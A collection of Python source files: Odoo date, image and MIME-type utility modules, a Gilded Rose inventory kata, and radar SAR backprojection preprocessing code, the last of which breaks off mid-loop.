date_to = (date_from + relativedelta(months=2))
date_to = date_to.replace(day=calendar.monthrange(date_to.year, date_to.month)[1])
return date_from, date_to
def get_fiscal_year(date, day=31, month=12):
''' Compute the fiscal year dates range on which the 'date' parameter belongs to.
    A fiscal year is the period used by governments for accounting purposes and varies between countries.
    By default, calling this method with only one parameter gives the calendar year because the ending date of the
    fiscal year is set to YYYY-12-31.
:param date: A datetime.datetime or datetime.date object.
:param day: The day of month the fiscal year ends.
:param month: The month of year the fiscal year ends.
:return: A tuple (date_from, date_to) having the same object type as the 'date' parameter.
'''
max_day = calendar.monthrange(date.year, month)[1]
date_to = type(date)(date.year, month, min(day, max_day))
# Force at 29 February instead of 28 in case of leap year.
if date_to.month == 2 and date_to.day == 28 and max_day == 29:
date_to = type(date)(date.year, 2, 29)
if date <= date_to:
date_from = date_to - relativedelta(years=1)
max_day = calendar.monthrange(date_from.year, date_from.month)[1]
# Force at 29 February instead of 28 in case of leap year.
if date_from.month == 2 and date_from.day == 28 and max_day == 29:
date_from = type(date)(date_from.year, 2, 29)
date_from += relativedelta(days=1)
else:
date_from = date_to + relativedelta(days=1)
max_day = calendar.monthrange(date_to.year + 1, date_to.month)[1]
date_to = type(date)(date.year + 1, month, min(day, max_day))
# Force at 29 February instead of 28 in case of leap year.
if date_to.month == 2 and date_to.day == 28 and max_day == 29:
date_to += relativedelta(days=1)
return date_from, date_to
def start_of(value, granularity):
"""
Get start of a time period from a date or a datetime.
:param value: initial date or datetime.
:param granularity: type of period in string, can be year, quarter, month, week, day or hour.
:return: a date/datetime object corresponding to the start of the specified period.
"""
is_datetime = isinstance(value, datetime)
if granularity == "year":
result = value.replace(month=1, day=1)
elif granularity == "quarter":
# Q1 = Jan 1st
# Q2 = Apr 1st
# Q3 = Jul 1st
# Q4 = Oct 1st
result = get_quarter(value)[0]
elif granularity == "month":
result = value.replace(day=1)
elif granularity == 'week':
# `calendar.weekday` uses ISO8601 for start of week reference, this means that
# by default MONDAY is the first day of the week and SUNDAY is the last.
result = value - relativedelta(days=calendar.weekday(value.year, value.month, value.day))
elif granularity == "day":
result = value
elif granularity == "hour" and is_datetime:
return datetime.combine(value, time.min).replace(hour=value.hour)
elif is_datetime:
raise ValueError(
"Granularity must be year, quarter, month, week, day or hour for value %s" % value
)
else:
raise ValueError(
"Granularity must be year, quarter, month, week or day for value %s" % value
)
return datetime.combine(result, time.min) if is_datetime else result
def end_of(value, granularity):
"""
Get end of a time period from a date or a datetime.
:param value: initial date or datetime.
:param granularity: Type of period in string, can be year, quarter, month, week, day or hour.
:return: A date/datetime object corresponding to the start of the specified period.
"""
is_datetime = isinstance(value, datetime)
if granularity == "year":
result = value.replace(month=12, day=31)
elif granularity == "quarter":
# Q1 = Mar 31st
# Q2 = Jun 30th
# Q3 = Sep 30th
# Q4 = Dec 31st
result = get_quarter(value)[1]
elif granularity == "month":
result = value + relativedelta(day=1, months=1, days=-1)
elif granularity == 'week':
# `calendar.weekday` uses ISO8601 for start of week reference, this means that
# by default MONDAY is the first day of the week and SUNDAY is the last.
result = value + relativedelta(days=6-calendar.weekday(value.year, value.month, value.day))
elif granularity == "day":
result = value
elif granularity == "hour" and is_datetime:
return datetime.combine(value, time.max).replace(hour=value.hour)
elif is_datetime:
raise ValueError(
"Granularity must be year, quarter, month, week, day or hour for value %s" % value
)
else:
raise ValueError(
"Granularity must be year, quarter, month, week or day for value %s" % value
)
return datetime.combine(result, time.max) if is_datetime else result
def add(value, *args, **kwargs):
"""
Return the sum of ``value`` and a :class:`relativedelta`.
:param value: initial date or datetime.
:param args: positional args to pass directly to :class:`relativedelta`.
:param kwargs: keyword args to pass directly to :class:`relativedelta`.
:return: the resulting date/datetime.
"""
return value + relativedelta(*args, **kwargs)
def subtract(value, *args, **kwargs):
"""
Return the difference between ``value`` and a :class:`relativedelta`.
:param value: initial date or datetime.
:param args: positional args to pass directly to :class:`relativedelta`.
:param kwargs: keyword args to pass directly to :class:`relativedelta`.
:return: the resulting date/datetime.
"""
return value - relativedelta(*args, **kwargs)
def json_default(obj):
"""
Properly serializes date and datetime objects.
"""
from odoo import fields
if isinstance(obj, date):
if isinstance(obj, datetime):
return fields.Datetime.to_string(obj)
return fields.Date.to_string(obj)
return ustr(obj)
def date_range(start, end, step=relativedelta(months=1)):
"""Date range generator with a step interval.
    :param start datetime: beginning date of the range.
:param end datetime: ending date of the range.
:param step relativedelta: interval of the range.
:return: a range of datetime from start to end.
:rtype: Iterator[datetime]
"""
are_naive = start.tzinfo is None and end.tzinfo is None
are_utc = start.tzinfo == pytz.utc and end.tzinfo == pytz.utc
    # Cases with miscellaneous timezones are more complex because of DST.
are_others = start.tzinfo and end.tzinfo and not are_utc
if are_others:
if start.tzinfo.zone != end.tzinfo.zone:
raise ValueError("Timezones of start argument and end argument seem inconsistent")
if not are_naive and not are_utc and not are_others:
raise ValueError("Timezones of start argument and end argument mismatch")
if start > end:
raise ValueError("start > end, start date must be before end")
if start == start + step:
raise ValueError("Looks like step is null")
if start.tzinfo:
localize = start.tzinfo.localize
else:
localize = lambda dt: dt
dt = start.replace(tzinfo=None)
end = end.replace(tzinfo=None)
while dt <= end:
yield localize(dt)
dt = dt + step
```
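A short usage sketch of the helpers above, assuming they are importable as `odoo.tools.date_utils` (as the file path suggests); the dates are arbitrary and the values in the comments follow directly from the code.
```python
from datetime import date, datetime
from odoo.tools.date_utils import get_quarter, start_of, end_of, date_range

print(get_quarter(date(2019, 5, 3)))                    # quarter bounds: 2019-04-01 to 2019-06-30
print(start_of(datetime(2019, 5, 3, 14, 30), 'week'))   # 2019-04-29 00:00:00, the Monday of that week
print(end_of(date(2019, 5, 3), 'month'))                # 2019-05-31
# Default step is one month, so this yields January 1, February 1 and March 1.
print(list(date_range(datetime(2019, 1, 1), datetime(2019, 3, 1))))
```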
#### File: odoo/tools/image.py
```python
import base64
import codecs
import io
from PIL import Image
from PIL import ImageEnhance
from random import randrange
# Preload PIL with the minimal subset of image formats we need
from odoo.tools import pycompat
Image.preinit()
Image._initialized = 2
# Maps only the first 6 bits of the base64 data, accurate enough
# for our purpose and faster than decoding the full blob first
FILETYPE_BASE64_MAGICWORD = {
b'/': 'jpg',
b'R': 'gif',
b'i': 'png',
b'P': 'svg+xml',
}
# ----------------------------------------
# Image resizing
# ----------------------------------------
def image_resize_image(base64_source, size=(1024, 1024), encoding='base64', filetype=None, avoid_if_small=False, upper_limit=False):
""" Function to resize an image. The image will be resized to the given
        size, while keeping the aspect ratio, and holes in the image will be
filled with transparent background. The image will not be stretched if
smaller than the expected size.
Steps of the resizing:
- Compute width and height if not specified.
- if avoid_if_small: if both image sizes are smaller than the requested
sizes, the original image is returned. This is used to avoid adding
transparent content around images that we do not want to alter but
just resize if too big. This is used for example when storing images
in the 'image' field: we keep the original image, resized to a maximal
size, without adding transparent content around it if smaller.
        - create a thumbnail of the source image by using the thumbnail
          function. Aspect ratios are preserved when using it. Note that if the
source image is smaller than the expected size, it will not be
extended, but filled to match the size.
- create a transparent background that will hold the final image.
- paste the thumbnail on the transparent background and center it.
:param base64_source: base64-encoded version of the source
image; if False, returns False
:param size: 2-tuple(width, height). A None value for any of width or
height mean an automatically computed value based respectively
on height or width of the source image.
:param encoding: the output encoding
:param filetype: the output filetype, by default the source image's
:type filetype: str, any PIL image format (supported for creation)
:param avoid_if_small: do not resize if image height and width
are smaller than the expected size.
"""
if not base64_source:
return False
    # Return unmodified content if no resize or we detect first 6 bits of '<'
# (0x3C) for SVG documents - This will bypass XML files as well, but it's
# harmless for these purposes
if size == (None, None) or base64_source[:1] == b'P':
return base64_source
image_stream = io.BytesIO(codecs.decode(base64_source, encoding))
image = Image.open(image_stream)
# store filetype here, as Image.new below will lose image.format
filetype = (filetype or image.format).upper()
filetype = {
'BMP': 'PNG',
}.get(filetype, filetype)
asked_width, asked_height = size
if upper_limit:
if asked_width:
if asked_width >= image.size[0]:
asked_width = image.size[0]
if asked_height:
if asked_height >= image.size[1]:
asked_height = image.size[1]
if image.size[0] >= image.size[1]:
asked_height = None
else:
asked_width = None
if asked_width is None and asked_height is None:
return base64_source
if asked_width is None:
asked_width = int(image.size[0] * (float(asked_height) / image.size[1]))
if asked_height is None:
asked_height = int(image.size[1] * (float(asked_width) / image.size[0]))
size = asked_width, asked_height
# check image size: do not create a thumbnail if avoiding smaller images
if avoid_if_small and image.size[0] <= size[0] and image.size[1] <= size[1]:
return base64_source
if image.size != size:
image = image_resize_and_sharpen(image, size, upper_limit=upper_limit)
if image.mode not in ["1", "L", "P", "RGB", "RGBA"] or (filetype == 'JPEG' and image.mode == 'RGBA'):
image = image.convert("RGB")
background_stream = io.BytesIO()
image.save(background_stream, filetype)
return codecs.encode(background_stream.getvalue(), encoding)
def image_resize_and_sharpen(image, size, preserve_aspect_ratio=False, factor=2.0, upper_limit=False):
"""
Create a thumbnail by resizing while keeping ratio.
A sharpen filter is applied for a better looking result.
:param image: PIL.Image.Image()
:param size: 2-tuple(width, height)
:param preserve_aspect_ratio: boolean (default: False)
:param factor: Sharpen factor (default: 2.0)
"""
origin_mode = image.mode
if image.mode != 'RGBA':
image = image.convert('RGBA')
image.thumbnail(size, Image.ANTIALIAS)
if preserve_aspect_ratio:
size = image.size
sharpener = ImageEnhance.Sharpness(image)
resized_image = sharpener.enhance(factor)
# create a transparent image for background and paste the image on it
if upper_limit:
image = Image.new('RGBA', (size[0], size[1]-3), (255, 255, 255, 0)) # FIXME temporary fix for trimming the ghost border.
else:
image = Image.new('RGBA', size, (255, 255, 255, 0))
image.paste(resized_image, ((size[0] - resized_image.size[0]) // 2, (size[1] - resized_image.size[1]) // 2))
if image.mode != origin_mode:
image = image.convert(origin_mode)
return image
def image_save_for_web(image, fp=None, format=None):
"""
Save image optimized for web usage.
:param image: PIL.Image.Image()
:param fp: File name or file object. If not specified, a bytestring is returned.
:param format: File format if could not be deduced from image.
"""
opt = dict(format=image.format or format)
if image.format == 'PNG':
opt.update(optimize=True)
if image.mode != 'P':
# Floyd Steinberg dithering by default
image = image.convert('RGBA').convert('P', palette=Image.WEB, colors=256)
elif image.format == 'JPEG':
opt.update(optimize=True, quality=80)
if fp:
image.save(fp, **opt)
else:
img = io.BytesIO()
image.save(img, **opt)
return img.getvalue()
def image_resize_image_big(base64_source, size=(1024, 1024), encoding='base64', filetype=None, avoid_if_small=True):
""" Wrapper on image_resize_image, to resize images larger than the standard
'big' image size: 1024x1024px.
:param size, encoding, filetype, avoid_if_small: refer to image_resize_image
"""
return image_resize_image(base64_source, size, encoding, filetype, avoid_if_small)
def image_resize_image_medium(base64_source, size=(128, 128), encoding='base64', filetype=None, avoid_if_small=False):
""" Wrapper on image_resize_image, to resize to the standard 'medium'
        image size: 128x128.
:param size, encoding, filetype, avoid_if_small: refer to image_resize_image
"""
return image_resize_image(base64_source, size, encoding, filetype, avoid_if_small)
def image_resize_image_small(base64_source, size=(64, 64), encoding='base64', filetype=None, avoid_if_small=False):
""" Wrapper on image_resize_image, to resize to the standard 'small' image
        size: 64x64.
:param size, encoding, filetype, avoid_if_small: refer to image_resize_image
"""
return image_resize_image(base64_source, size, encoding, filetype, avoid_if_small)
# ----------------------------------------
# Crop Image
# ----------------------------------------
def crop_image(data, type='top', ratio=False, size=None, image_format=None):
""" Used for cropping image and create thumbnail
:param data: base64 data of image.
:param type: Used for cropping position possible
Possible Values : 'top', 'center', 'bottom'
:param ratio: Cropping ratio
e.g for (4,3), (16,9), (16,10) etc
send ratio(1,1) to generate square image
:param size: Resize image to size
e.g (200, 200)
after crop resize to 200x200 thumbnail
:param image_format: return image format PNG,JPEG etc
"""
if not data:
return False
image_stream = Image.open(io.BytesIO(base64.b64decode(data)))
output_stream = io.BytesIO()
w, h = image_stream.size
new_h = h
new_w = w
if ratio:
w_ratio, h_ratio = ratio
new_h = (w * h_ratio) // w_ratio
new_w = w
if new_h > h:
new_h = h
new_w = (h * w_ratio) // h_ratio
image_format = image_format or image_stream.format or 'JPEG'
if type == "top":
cropped_image = image_stream.crop((0, 0, new_w, new_h))
cropped_image.save(output_stream, format=image_format)
elif type == "center":
cropped_image = image_stream.crop(((w - new_w) // 2, (h - new_h) // 2, (w + new_w) // 2, (h + new_h) // 2))
cropped_image.save(output_stream, format=image_format)
elif type == "bottom":
cropped_image = image_stream.crop((0, h - new_h, new_w, h))
cropped_image.save(output_stream, format=image_format)
else:
raise ValueError('ERROR: invalid value for crop_type')
if size:
thumbnail = Image.open(io.BytesIO(output_stream.getvalue()))
output_stream.truncate(0)
output_stream.seek(0)
thumbnail.thumbnail(size, Image.ANTIALIAS)
thumbnail.save(output_stream, image_format)
return base64.b64encode(output_stream.getvalue())
# ----------------------------------------
# Colors
# ---------------------------------------
def image_colorize(original, randomize=True, color=(255, 255, 255)):
""" Add a color to the transparent background of an image.
:param original: file object on the original image file
:param randomize: randomize the background color
:param color: background-color, if not randomize
"""
# create a new image, based on the original one
original = Image.open(io.BytesIO(original))
image = Image.new('RGB', original.size)
    # generate the background color, paste it as background
if randomize:
color = (randrange(32, 224, 24), randrange(32, 224, 24), randrange(32, 224, 24))
image.paste(color, box=(0, 0) + original.size)
image.paste(original, mask=original)
# return the new image
buffer = io.BytesIO()
image.save(buffer, 'PNG')
return buffer.getvalue()
# ----------------------------------------
# Misc image tools
# ---------------------------------------
def image_get_resized_images(base64_source, return_big=False, return_medium=True, return_small=True,
big_name='image', medium_name='image_medium', small_name='image_small',
avoid_resize_big=True, avoid_resize_medium=False, avoid_resize_small=False, sizes={}):
""" Standard tool function that returns a dictionary containing the
big, medium and small versions of the source image. This function
is meant to be used for the methods of functional fields for
models using images.
Default parameters are given to be used for the getter of functional
image fields, for example with res.users or res.partner. It returns
only image_medium and image_small values, to update those fields.
:param base64_source: base64-encoded version of the source
image; if False, all returned values will be False
:param return_{..}: if set, computes and return the related resizing
of the image
:param {..}_name: key of the resized image in the return dictionary;
'image', 'image_medium' and 'image_small' by default.
:param avoid_resize_[..]: see avoid_if_small parameter
:return return_dict: dictionary with resized images, depending on
previous parameters.
"""
return_dict = dict()
size_big = sizes.get(big_name, (1024, 1024))
size_medium = sizes.get(medium_name, (128, 128))
size_small = sizes.get(small_name, (64, 64))
if isinstance(base64_source, pycompat.text_type):
base64_source = base64_source.encode('ascii')
if return_big:
return_dict[big_name] = image_resize_image_big(base64_source, avoid_if_small=avoid_resize_big, size=size_big)
if return_medium:
return_dict[medium_name] = image_resize_image_medium(base64_source, avoid_if_small=avoid_resize_medium, size=size_medium)
if return_small:
return_dict[small_name] = image_resize_image_small(base64_source, avoid_if_small=avoid_resize_small, size=size_small)
return return_dict
def image_resize_images(vals, big_name='image', medium_name='image_medium', small_name='image_small', sizes={}):
""" Update ``vals`` with image fields resized as expected. """
if vals.get(big_name):
vals.update(image_get_resized_images(vals[big_name],
return_big=True, return_medium=True, return_small=True,
big_name=big_name, medium_name=medium_name, small_name=small_name,
avoid_resize_big=True, avoid_resize_medium=False, avoid_resize_small=False, sizes=sizes))
elif vals.get(medium_name):
vals.update(image_get_resized_images(vals[medium_name],
return_big=True, return_medium=True, return_small=True,
big_name=big_name, medium_name=medium_name, small_name=small_name,
avoid_resize_big=True, avoid_resize_medium=True, avoid_resize_small=False, sizes=sizes))
elif vals.get(small_name):
vals.update(image_get_resized_images(vals[small_name],
return_big=True, return_medium=True, return_small=True,
big_name=big_name, medium_name=medium_name, small_name=small_name,
avoid_resize_big=True, avoid_resize_medium=True, avoid_resize_small=True, sizes=sizes))
elif big_name in vals or medium_name in vals or small_name in vals:
vals[big_name] = vals[medium_name] = vals[small_name] = False
def image_data_uri(base64_source):
"""This returns data URL scheme according RFC 2397
(https://tools.ietf.org/html/rfc2397) for all kind of supported images
(PNG, GIF, JPG and SVG), defaulting on PNG type if not mimetype detected.
"""
return 'data:image/%s;base64,%s' % (
FILETYPE_BASE64_MAGICWORD.get(base64_source[:1], 'png'),
base64_source.decode(),
)
if __name__=="__main__":
import sys
assert len(sys.argv)==3, 'Usage to Test: image.py SRC.png DEST.png'
img = base64.b64encode(open(sys.argv[1],'rb').read())
new = image_resize_image(img, (128,100))
open(sys.argv[2], 'wb').write(base64.b64decode(new))
```
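A rough usage sketch for the resize helpers above, assuming the module is importable as `odoo.tools.image` and a Pillow version that still provides `Image.ANTIALIAS` (as the code above expects); the source image is generated on the fly.
```python
import base64
import io
from PIL import Image
from odoo.tools.image import image_resize_image, image_data_uri

# Build a small base64-encoded PNG to feed into the resize helper.
buf = io.BytesIO()
Image.new('RGB', (300, 200), (10, 20, 30)).save(buf, 'PNG')
source = base64.b64encode(buf.getvalue())

resized = image_resize_image(source, size=(64, 64))  # base64 PNG, padded to 64x64
print(image_data_uri(resized)[:22])                  # data:image/png;base64,
```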
#### File: odoo/tools/mimetypes.py
```python
import collections
import io
import logging
import re
import zipfile
__all__ = ['guess_mimetype']
_logger = logging.getLogger(__name__)
# We define our own guess_mimetype implementation and if magic is available we
# use it instead.
# discriminants for zip-based file formats
_ooxml_dirs = {
'word/': 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'pt/': 'application/vnd.openxmlformats-officedocument.presentationml.presentation',
'xl/': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
}
def _check_ooxml(data):
with io.BytesIO(data) as f, zipfile.ZipFile(f) as z:
filenames = z.namelist()
# OOXML documents should have a [Content_Types].xml file for early
# check that we're interested in this thing at all
if '[Content_Types].xml' not in filenames:
return False
# then there is a directory whose name denotes the type of the file:
# word, pt (powerpoint) or xl (excel)
for dirname, mime in _ooxml_dirs.items():
if any(entry.startswith(dirname) for entry in filenames):
return mime
return False
# checks that a string looks kinda sorta like a mimetype
_mime_validator = re.compile(r"""
[\w-]+ # type-name
/ # subtype separator
[\w-]+ # registration facet or subtype
(?:\.[\w-]+)* # optional faceted name
(?:\+[\w-]+)? # optional structured syntax specifier
""", re.VERBOSE)
def _check_open_container_format(data):
# Open Document Format for Office Applications (OpenDocument) Version 1.2
#
# Part 3: Packages
# 3 Packages
# 3.3 MIME Media Type
with io.BytesIO(data) as f, zipfile.ZipFile(f) as z:
# If a MIME media type for a document exists, then an OpenDocument
# package should contain a file with name "mimetype".
if 'mimetype' not in z.namelist():
return False
# The content of this file shall be the ASCII encoded MIME media type
# associated with the document.
marcel = z.read('mimetype').decode('ascii')
# check that it's not too long (RFC6838 § 4.2 restricts type and
# subtype to 127 characters each + separator, strongly recommends
# limiting them to 64 but does not require it) and that it looks a lot
# like a valid mime type
if len(marcel) < 256 and _mime_validator.match(marcel):
return marcel
return False
_xls_pattern = re.compile(b"""
\x09\x08\x10\x00\x00\x06\x05\x00
| \xFD\xFF\xFF\xFF(\x10|\x1F|\x20|"|\\#|\\(|\\))
""", re.VERBOSE)
_ppt_pattern = re.compile(b"""
\x00\x6E\x1E\xF0
| \x0F\x00\xE8\x03
| \xA0\x46\x1D\xF0
| \xFD\xFF\xFF\xFF(\x0E|\x1C|\x43)\x00\x00\x00
""", re.VERBOSE)
def _check_olecf(data):
""" Pre-OOXML Office formats are OLE Compound Files which all use the same
file signature ("magic bytes") and should have a subheader at offset 512
(0x200).
Subheaders taken from http://www.garykessler.net/library/file_sigs.html
according to which Mac office files *may* have different subheaders. We'll
ignore that.
"""
offset = 0x200
if data.startswith(b'\xEC\xA5\xC1\x00', offset):
return 'application/msword'
# the _xls_pattern stuff doesn't seem to work correctly (the test file
# only has a bunch of \xf* at offset 0x200), that apparently works
elif b'Microsoft Excel' in data:
return 'application/vnd.ms-excel'
elif _ppt_pattern.match(data, offset):
return 'application/vnd.ms-powerpoint'
return False
def _check_svg(data):
"""This simply checks the existence of the opening and ending SVG tags"""
if b'<svg' in data and b'/svg>' in data:
return 'image/svg+xml'
# for "master" formats with many subformats, discriminants is a list of
# functions, tried in order and the first non-falsy value returned is the
# selected mime type. If all functions return falsy values, the master
# mimetype is returned.
_Entry = collections.namedtuple('_Entry', ['mimetype', 'signatures', 'discriminants'])
_mime_mappings = (
# pdf
_Entry('application/pdf', [b'%PDF'], []),
# jpg, jpeg, png, gif, bmp
_Entry('image/jpeg', [b'\xFF\xD8\xFF\xE0', b'\xFF\xD8\xFF\xE2', b'\xFF\xD8\xFF\xE3', b'\xFF\xD8\xFF\xE1'], []),
_Entry('image/png', [b'\x89PNG\r\n\x1A\n'], []),
_Entry('image/gif', [b'GIF87a', b'GIF89a'], []),
_Entry('image/bmp', [b'BM'], []),
_Entry('image/svg+xml', [b'<'], [
_check_svg,
]),
# OLECF files in general (Word, Excel, PPT, default to word because why not?)
_Entry('application/msword', [b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1', b'\x0D\x44\x4F\x43'], [
_check_olecf
]),
# zip, but will include jar, odt, ods, odp, docx, xlsx, pptx, apk
_Entry('application/zip', [b'PK\x03\x04'], [_check_ooxml, _check_open_container_format]),
)
def guess_mimetype(bin_data, default='application/octet-stream'):
""" Attempts to guess the mime type of the provided binary data, similar
to but significantly more limited than libmagic
:param str bin_data: binary data to try and guess a mime type for
:returns: matched mimetype or ``application/octet-stream`` if none matched
"""
# by default, guess the type using the magic number of file hex signature (like magic, but more limited)
# see http://www.filesignatures.net/ for file signatures
for entry in _mime_mappings:
for signature in entry.signatures:
if bin_data.startswith(signature):
for discriminant in entry.discriminants:
try:
guess = discriminant(bin_data)
if guess: return guess
except Exception:
# log-and-next
_logger.getChild('guess_mimetype').warn(
"Sub-checker '%s' of type '%s' failed",
discriminant.__name__, entry.mimetype,
exc_info=True
)
# if no discriminant or no discriminant matches, return
# primary mime type
return entry.mimetype
return default
try:
import magic
except ImportError:
magic = None
else:
# There are 2 python libs named 'magic' with incompatible api.
# magic from pypi https://pypi.python.org/pypi/python-magic/
if hasattr(magic,'from_buffer'):
guess_mimetype = lambda bin_data, default=None: magic.from_buffer(bin_data, mime=True)
# magic from file(1) https://packages.debian.org/squeeze/python-magic
elif hasattr(magic,'open'):
ms = magic.open(magic.MAGIC_MIME_TYPE)
ms.load()
guess_mimetype = lambda bin_data, default=None: ms.buffer(bin_data)
``` |
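A few spot checks for the detector above, assuming it is importable as `odoo.tools.mimetypes`; the expected results in the comments apply to the pure-Python fallback (when `python-magic` is installed, `guess_mimetype` is replaced and the exact strings may differ).
```python
from odoo.tools.mimetypes import guess_mimetype

print(guess_mimetype(b'%PDF-1.5 ...'))                     # application/pdf
print(guess_mimetype(b'\x89PNG\r\n\x1a\n' + b'\x00' * 8))  # image/png
print(guess_mimetype(b'<svg xmlns="http://www.w3.org/2000/svg"></svg>'))  # image/svg+xml
print(guess_mimetype(b'no known signature here'))          # application/octet-stream
```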
{
"source": "JJimenez-1/ollivanders_wands_shop",
"score": 3
} |
#### File: ollivanders_wands_shop/domain/updatable.py
```python
from abc import ABCMeta, abstractmethod
class Updatable(metaclass=ABCMeta):
@abstractmethod
def update_quality(self):
pass
```
#### File: JJimenez-1/ollivanders_wands_shop/main.py
```python
from domain.gildedrose import *
def main(days_passed):
inventory = Gildedrose([Normalitem("+5 Dexterity Vest", 10, 20),
Agedbrie("Aged Brie", 2, 0),
Normalitem("Elixir of the Mongoose", 5, 7),
Sulfuras("Sulfuras, Hand of Ragnaros", 0, 80),
Sulfuras("Sulfuras, Hand of Ragnaros", -1, 80),
Backstagepass("Backstage passes to a TAFKAL80ETC concert", 15, 20),
Backstagepass("Backstage passes to a TAFKAL80ETC concert", 10, 49),
Backstagepass("Backstage passes to a TAFKAL80ETC concert", 5, 49),
Conjured("Conjured Mana Cake", 3, 6)])
inventory.add_item()
actual_inventory = inventory.get_items()
print("----------- Inventory right now -----------")
for item in actual_inventory:
print(item)
for day in range(1, days_passed + 1):
print("---------- Inventory updated: Day " + str(day) + " ----------")
inventory.update_quality()
for item in inventory.items:
print(item)
list_of_items_updated = []
for item in inventory.items:
list_of_items_updated.append(item.__repr__())
return list_of_items_updated
if __name__ == "__main__":
main(30)
``` |
{
"source": "jjimmykang/bwsi-backprojection",
"score": 3
} |
#### File: backprojection/pulson440/preprocess_data.py
```python
import pickle
import argparse
import numpy as np
from math import floor
from matplotlib.animation import FuncAnimation, PillowWriter
import matplotlib.pyplot as plt
from matplotlib.ticker import Formatter
from matplotlib import transforms
import time
from backproj import backproject_vectorize_real
from helper_functions import replace_nan
def open_file(dir):
    '''Takes the path of a pickle file and returns its unpickled contents
Arguments:
dir(str)
the path of the file
Returns:
        return_file(object)
            the unpickled contents of the file
'''
with open(dir, 'rb') as f:
return_file = pickle.load(f)
return return_file
def main():
# Parse arguments
parser = argparse.ArgumentParser(description='preprocess sar data(with csv also)')
parser.add_argument('folder_path', type=str, help='path to folder')
parser.add_argument('radar_path', type=str, help='name of unpacked radar pickle file')
parser.add_argument('mocap_path', type=str, help='name of unpacked data file')
parser.add_argument('first_reflector_path', type=str, help='path to the first reflector mocap data')
parser.add_argument('second_reflector_path', type=str, help='path to the second reflector mocap data')
args = parser.parse_args()
# Fetch paths
radar_path = args.folder_path + '/' + args.radar_path
mocap_path = args.folder_path + '/' + args.mocap_path
return_data = {}
# Fetch radar data and put into dictionary
radar_data = open_file(radar_path)
return_data['scan_data'] = np.asarray(radar_data['scan_data'])
return_data['scan_timestamps'] = np.asarray(radar_data['timestamps'])
return_data['range_bins'] = np.asarray(radar_data['range_bins'])
print('scan_data.shape:', np.asarray(radar_data['scan_data']).shape)
print('scan_timestamps.shape:', np.asarray(radar_data['timestamps']).shape)
print('range_bins.shape:', np.asarray(radar_data['range_bins']).shape)
# Fetch mocap data(platform positions and timestamps)
mocap_data = open_file(mocap_path)
mocap_array = np.asarray(mocap_data)
platform_pos_temp = mocap_array[:, 0]
platform_pos = np.asarray(list(platform_pos_temp[:]))
print('platform_pos.shape:', platform_pos.shape)
motion_timestamps_temp = mocap_array[:, 1]
motion_timestamps = np.asarray(list(motion_timestamps_temp[:]))
print('motion_timestamps.shape:', motion_timestamps.shape)
# Fix NaNs with mocap data
return_data['motion_timestamps'], return_data['platform_pos'] = replace_nan(motion_timestamps, platform_pos)
# Fetch platform data
corner_reflector_pos = np.empty((2, 3))
reflector_1 = open_file(args.folder_path + '/' + args.first_reflector_path)
reflector_1_mocap = np.asarray(reflector_1)
corner_reflector_pos[0, :] = np.asarray(reflector_1[0][0])
reflector_2 = open_file(args.folder_path + '/' + args.second_reflector_path)
reflector_2_mocap = np.asarray(reflector_2)
corner_reflector_pos[1, :] = np.asarray(reflector_2[0][0])
return_data['corner_reflector_pos'] = corner_reflector_pos
# Paste output to pickle file in same directory
MASTER_PATH = args.folder_path + '/master_data.pkl'
with open(MASTER_PATH, 'wb') as p:
pickle.dump(return_data, p)
if __name__ == '__main__':
main()
```
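For context, a hypothetical snippet showing how the `master_data.pkl` written above might be read back; the path is made up, and the keys mirror the dictionary built in `main()`.
```python
import pickle

# Illustrative path only.
with open('run_folder/master_data.pkl', 'rb') as f:
    data = pickle.load(f)

print(sorted(data.keys()))
# ['corner_reflector_pos', 'motion_timestamps', 'platform_pos',
#  'range_bins', 'scan_data', 'scan_timestamps']
print(data['corner_reflector_pos'].shape)  # (2, 3): one row per corner reflector
```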
#### File: legacy/deprecated_backproj/backproj copy.py
```python
import pickle
import bisect
import math
import numpy as np
import matplotlib.pyplot as plt
import time
from numba import vectorize
datafile_name = "./data/5Points_1way_data.pkl"
# datafile_name = "./data/challenge_fun.pkl"
with open(datafile_name, 'rb') as file:
data = pickle.load(file)
# print(data["range_bins"])
# last = 0
# for x in data["range_bins"][0] :
# print(x-last)
# last = x
# print("odjafoidsjfoi")
# print()
# print(data["scan_data"])
# print()
# print(data["platform_pos"])
data["scan_data"] = np.asarray(data["scan_data"])
data["platform_pos"] = np.asarray(data["platform_pos"])
data["range_bins"] = np.asarray(data["range_bins"])
x_loc_real = [6*a/120-3 for a in range(120)]
y_loc_real = [6*a/120-3 for a in range(120)]
pixels = [[b for b in range(120)] for a in range(120)]
@vectorize(['float32(float32, float32, float32, float32, float32, float32)'], target='cpu')
def distance(x_a, y_a, z_a, x_b, y_b, z_b) :
return ( (x_a-x_b)**2 + (y_a-y_b)**2 + (z_a-z_b)**2 ) ** .5
start_time = time.time()
for x in range(len(x_loc_real)) :
for y in range(len(y_loc_real)) :
x_loc = x_loc_real[x]
y_loc = y_loc_real[y]
z_loc = 0
total_dists = np.asarray([])
platform_locs_full = data["platform_pos"]
# print("PLATFORM LOCS DIMENSIONS")
# print(len(platform_locs_full))
# print(len(platform_locs_full[0]))
platform_locs_x = platform_locs_full[:,0]
platform_locs_y = platform_locs_full[:,1]
platform_locs_z = platform_locs_full[:,2]
x_locs = np.full(len(platform_locs_x), x_loc)
y_locs = np.full(len(platform_locs_y), y_loc)
z_locs = np.zeros(len(x_locs))
total_dists = np.sqrt( np.square( (platform_locs_x-x_locs) ) + np.square( (platform_locs_y-y_locs) ) + np.square( (platform_locs_z-z_locs) ) )
# total_dists = distance(platform_locs_x, platform_locs_y, platform_locs_z, x_loc, y_loc, z_loc)
# x = np.square( (platform_locs_x-x_locs) )
# for i in range(len(data["platform_pos"])) :
# platform_loc = data["platform_pos"][i]
# total_dists.append(math.sqrt( (platform_loc[0]-x_loc)**2 + (platform_loc[1]-y_loc)**2 + (platform_loc[2]-z_loc)**2 ) )
# # plane
# # result = data["range_bins"][0][closest_range_bin - 1]
range_bins_list = []
for i in range(len(total_dists)) :
closest_range_bin_ind = bisect.bisect_left(data["range_bins"][0], total_dists[i]) -1 #TODO: see if its -1 ind or not
# closest_range_bin_ind = int(round((total_dists[i] - data["range_bins"][0][0])/0.01845))
# closest_range_bin_ind = math.floor((total_dists[i] - data["range_bins"][0][0])/0.01845)
# print((total_dists[i] - data["range_bins"][0][0])/0.01845)
scan_data = data["scan_data"][i][closest_range_bin_ind]
range_bins_list.append(scan_data)
# for s in range(scan_data) :
